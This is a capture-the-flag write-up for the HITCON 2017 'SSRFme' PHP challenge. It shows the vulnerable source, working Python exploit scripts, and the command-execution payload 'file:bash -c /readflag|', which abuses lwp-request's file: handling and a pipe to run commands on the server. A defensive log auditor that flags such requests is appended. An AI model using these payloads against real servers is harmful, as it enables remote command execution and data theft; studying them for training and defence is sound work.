[HITCON 2017] SSRFme


Challenge source code

The response begins with the echoed REMOTE_ADDR (122.192.27.100 here), followed by the highlighted source:

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"])); // strip the dots from the dirname part of filename to block directory traversal
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

Flow
The sandbox directory is md5("orange" . "122.192.27.100").
The url parameter is handed to the GET command (lwp-request) through shell_exec, with escapeshellarg applied to it.
The output of that shell_exec call is written to the file named by the filename parameter, inside the sandbox.
Script from https://momomoxiaoxi.com/2017/11/08/HITCON/

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = '../../../../../'
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'  # sandbox/md5("orange" . REMOTE_ADDR)/data

r = requests.get(url = url+payload.format(exp))  # run the command first; its output is written into data
r = requests.get(url+see)                         # then read the data file back
print(r.text)

<HTML>
<HEAD>
<TITLE>Directory ../../../../../</TITLE>
<BASE HREF="file:../../../../../">
</HEAD>
<BODY>
<H1>Directory listing of ../../../../../</H1>
<UL>
<LI><A HREF="./">./</A>
<LI><A HREF="../">../</A>
<LI><A HREF=".dockerenv">.dockerenv</A>
<LI><A HREF="bin/">bin/</A>
<LI><A HREF="boot/">boot/</A>
<LI><A HREF="dev/">dev/</A>
<LI><A HREF="etc/">etc/</A>
<LI><A HREF="flag">flag</A>
<LI><A HREF="home/">home/</A>
<LI><A HREF="lib/">lib/</A>
<LI><A HREF="lib64/">lib64/</A>
<LI><A HREF="media/">media/</A>
<LI><A HREF="mnt/">mnt/</A>
<LI><A HREF="opt/">opt/</A>
<LI><A HREF="proc/">proc/</A>
<LI><A HREF="readflag">readflag</A>
<LI><A HREF="root/">root/</A>
<LI><A HREF="run/">run/</A>
<LI><A HREF="sbin/">sbin/</A>
<LI><A HREF="srv/">srv/</A>
<LI><A HREF="start.sh">start.sh</A>
<LI><A HREF="sys/">sys/</A>
<LI><A HREF="tmp/">tmp/</A>
<LI><A HREF="usr/">usr/</A>
<LI><A HREF="var/">var/</A>
</UL>
</BODY>
</HTML>

Fetch the readflag binary the same way, open it in IDA64 and press F5 to decompile it.

Use readflag to read the flag.
Here the flag is read with bash -c /readflag, which has the same effect as running ./readflag from the root directory.
Image from https://blog.csdn.net/SopRomeo/article/details/106013885

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = 'file:bash -c /readflag|'  # without the trailing pipe character no file seems to be created
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp))  # GET fetches the "file:" URL; the pipe makes the output of the command the fetched content
r = requests.get(url+see)                         # read the data file back
print(r.text)
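Seen from the defending side, both scripts above rely on a url value that is not a plain http(s) fetch (a relative path, then the file: scheme) and on a trailing |. As an added example that is not part of the original writeup or the challenge code, the Python below audits constructed access-log lines for exactly those traits, plus a filename that would leave the sandbox; the log format, the host and the audit_* function names are assumptions.

```python
# Added defensive example for this writeup (not the challenge's or any cited
# author's code). Flags SSRFme-style requests whose "url" parameter is not a
# plain http(s) fetch, or whose "filename" parameter leaves the sandbox.
from urllib.parse import parse_qs, urlsplit
import re

ALLOWED_SCHEMES = {"http", "https"}
LOG_RE = re.compile(r'"GET (?P<path>\S+) HTTP/')

# Constructed access-log lines in a combined-style format (hypothetical host).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Nov/2017:12:00:00 +0000] "GET /?url=http://example.com/&filename=data HTTP/1.1" 200 512',
    '192.0.2.10 - - [08/Nov/2017:12:00:01 +0000] "GET /?url=../../../../../&filename=data HTTP/1.1" 200 1024',
    '192.0.2.10 - - [08/Nov/2017:12:00:02 +0000] "GET /?url=file:bash%20-c%20/readflag|&filename=data HTTP/1.1" 200 64',
]

def audit_url_param(value: str) -> list:
    """Return the reasons a decoded 'url' value should be rejected (empty list = benign)."""
    reasons = []
    scheme = urlsplit(value.strip()).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # GET (lwp-request) accepts file: and relative paths, so only http(s) is expected
        reasons.append(f"scheme '{scheme or 'none'}' not in allowlist")
    if value.strip().endswith("|"):
        # a trailing '|' is Perl's two-argument open() "read from a command" form,
        # which is how the file: fetch became command execution in this challenge
        reasons.append("trailing '|' in url")
    return reasons

def audit_filename_param(value: str) -> list:
    # Reject names that would escape the per-client sandbox directory
    if value.startswith("/") or ".." in value.split("/"):
        return ["filename escapes sandbox"]
    return []

def audit_log_line(line: str) -> list:
    """Parse one log line and audit its url/filename query parameters."""
    m = LOG_RE.search(line)
    if not m:
        return []
    params = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    findings = []
    for u in params.get("url", []):
        findings += audit_url_param(u)
    for f in params.get("filename", []):
        findings += audit_filename_param(f)
    return findings

def audit_log(lines=SAMPLE_LOG) -> dict:
    """Map each flagged line index to its findings (unflagged lines are omitted)."""
    return {i: r for i, line in enumerate(lines) if (r := audit_log_line(line))}
```

Only the scheme and pipe checks are specific to this challenge; a benign-looking http(s) URL can still point at an internal host, so a host allowlist belongs next to them in a real deployment.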

